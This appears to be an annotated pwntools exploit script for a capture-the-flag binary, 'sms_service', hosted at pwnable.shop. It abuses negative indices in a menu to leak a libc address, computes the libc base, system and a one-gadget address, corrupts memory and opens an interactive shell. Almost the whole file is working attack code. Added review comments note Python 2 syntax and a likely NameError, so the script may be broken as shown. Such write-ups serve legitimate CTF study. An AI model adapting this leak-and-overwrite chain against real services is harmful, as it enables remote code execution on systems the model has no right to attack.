꿀잼 문제
from pwn import *
#s = process("./sms_service",env={'LD_PRELOAD':'./libc'})
# Connection to the live service; the commented-out process(...) line above is
# the offline variant of the same handle.  Both ELF objects are parsed for
# symbol offsets, but in this listing only libc's 'puts' and 'system' symbols
# are read (in main()); `elf` is not referenced anywhere else here.
s = remote("pwnable.shop",10001)
elf = ELF("./sms_service")
libc = ELF("./libc")
def soldier(name,index):
    """Walk the "soldier" menu path: option 1, option 1, then *name*, then *index*.

    Each step waits for the ">> " prompt before sending.  *name* goes out with
    ``s.send`` (no trailing newline), so the caller controls the exact bytes
    and length; *index* is sent as its decimal string via ``sendline``.
    Callers in this listing pass negative indices (-19 and -263011).
    Nothing is returned; the response is consumed by the caller (see main()).
    """
    s.recvuntil(">> ")
    s.sendline("1")
    s.recvuntil(">> ")
    s.sendline("1")
    s.recvuntil(">> ")
    s.send(name)
    s.recvuntil(">> ")
    s.sendline(str(index))
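def citizen_set(cti_name):
    """Walk the "citizen" menu path: option 2, then *cti_name* as one line.

    Each step waits for the ">> " prompt before sending.  *cti_name* is sent
    with ``sendline`` (a "\\n" is appended); callers pass both a packed
    8-byte value (``p64(...)``) and a plain string.

    Only one definition is kept here.  The original file also had a
    zero-argument ``citizen_set()`` immediately above this one that referenced
    an undefined ``cti_name`` (a NameError if it were ever called) and was
    shadowed by this definition, so it was dead code.
    """
    s.recvuntil(">> ")
    s.sendline('2')
    s.recvuntil(">> ")
    s.sendline(cti_name)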
def main():
    """Select option 3, call soldier("\\x00", -263011), then read the 6 bytes
    printed after "Msg : " and unpack them as a little-endian address.

    From that value it derives ``libc_base`` via libc's 'puts' symbol and
    computes ``system`` and ``one_shot`` (``libc_base + 0xf02a4``, a
    hard-coded offset that is only meaningful for the bundled ./libc build).
    All three are printed.  Nothing is returned and no global is assigned.

    NOTE(review): this is Python 2 code (print statement; ``s.recv(6)+"\\x00\\x00"``
    concatenates str with str).  Under Python 3 the concatenation would raise
    TypeError because recv() returns bytes.
    """
    s.recvuntil(">> ")
    s.sendline("3")
    soldier("\x00",-263011)
    s.recvuntil("Msg : ")
    # 6 leaked bytes padded to 8 for u64; Python 2 str concatenation.
    leak = u64(s.recv(6)+"\x00\x00")
    print "leak : " + hex(leak)
    libc_base = leak - libc.symbols['puts']
    system = libc_base + libc.symbols['system']
    # Fixed offset into ./libc; valid only for that exact library build.
    one_shot = libc_base + 0xf02a4
    print "libc_base : " + hex(libc_base)
    print "system : " + hex(system)
    print "one_shot : " + hex(one_shot)
# Module-level interaction sequence; runs as soon as the file is executed.
# main() is called before every step so the leak/offsets are re-read and
# printed each time (its results are only printed, not stored).
main()
# -19 is the index used by the next two soldier() calls.
citizen_set(p64(0x10539))
main()
soldier("A"*64,-19)
main()
soldier("\x00"*64,-19)
main()
soldier("JIWON",-263011)
main()
citizen_set("JIWON")
s.recvuntil(">> ")
s.sendline("1")
s.recvuntil(">> ")
# NOTE(review): with the indentation reconstructed as above, one_shot is a
# local variable of main() and is never assigned at module level, so this
# line would raise NameError.  Confirm the original file's scoping (e.g. a
# `global` declaration or main()'s body at top level) before relying on it.
s.sendline(p64(one_shot))
s.interactive()